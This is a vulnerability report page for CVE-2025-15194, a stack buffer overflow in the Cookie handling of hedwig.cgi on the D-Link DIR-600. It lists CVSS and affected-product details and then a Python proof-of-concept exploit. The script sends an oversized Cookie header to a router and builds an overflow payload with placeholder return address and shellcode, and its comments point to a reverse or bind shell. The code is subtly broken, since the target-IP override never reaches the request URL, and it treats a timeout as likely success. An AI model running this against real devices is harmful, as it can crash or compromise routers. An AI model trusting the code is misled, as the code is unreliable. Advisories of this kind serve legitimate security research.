Security Vulnerability Report
CVE-2025-15194 CVSS 9.8 CRITICAL

Published: 2025-12-29 16:15:42
Last Modified: 2026-01-13 21:11:47

Description

A vulnerability was found in D-Link DIR-600 up to 2.15WWb02. Affected by this vulnerability is an unknown functionality of the file hedwig.cgi of the component HTTP Header Handler. The manipulation of the argument Cookie results in stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been made public and could be used. This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-600_firmware:2.15ww:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dir-600:b2:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DIR-600, all versions up to 2.15WWb02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-15194 PoC - D-Link DIR-600 hedwig.cgi Stack Buffer Overflow
Note: This PoC is for educational and authorized testing purposes only.
"""
import requests
import sys

TARGET_IP = "192.168.0.1"  # Default D-Link router IP
TARGET_PORT = 80
TARGET_URL = f"http://{TARGET_IP}:{TARGET_PORT}/hedwig.cgi"


def create_exploit_payload():
    """
    Generate malicious Cookie header to trigger buffer overflow.
    The payload structure:
    - Padding to overflow the buffer
    - Return address overwrite (ROP gadget address)
    - Shellcode or additional ROP chain
    """
    # Buffer size in hedwig.cgi (adjust based on target firmware)
    buffer_size = 1024
    # Padding to fill the buffer
    padding = b'A' * buffer_size
    # Overwrite return address (example ROP gadget)
    # In real exploit, this would be an address pointing to pop;ret gadget
    return_addr = b'\xaa\xbb\xcc\xdd'  # Placeholder - need to find actual gadget
    # NOP sled for reliability
    nop_sled = b'\x90' * 64
    # Shellcode for MIPS architecture (D-Link router CPU)
    # This is a placeholder - actual shellcode would execute bind shell or reverse shell
    shellcode = b'\x00\x00\x00\x00'  # Placeholder shellcode
    payload = padding + return_addr + nop_sled + shellcode
    return payload


def check_vulnerability(target_ip):
    """Check if target is vulnerable by sending oversized Cookie header."""
    print(f"[*] Testing CVE-2025-15194 on {target_ip}")
    # Create malicious Cookie header
    evil_cookie = f"uid=1; " + "A" * 2000  # Oversized value to trigger overflow
    headers = {
        'Cookie': evil_cookie,
        'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-15194-Test)',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    try:
        response = requests.get(TARGET_URL, headers=headers, timeout=5)
        print(f"[+] Response received: Status {response.status_code}")
        return True
    except requests.exceptions.Timeout:
        print("[!] Request timed out - possible successful exploitation")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_IP = sys.argv[1]
    print("=" * 60)
    print("CVE-2025-15194 PoC - D-Link DIR-600 hedwig.cgi")
    print("Stack-Based Buffer Overflow Vulnerability")
    print("=" * 60)
    check_vulnerability(TARGET_IP)
```

References

Raw JSON Data
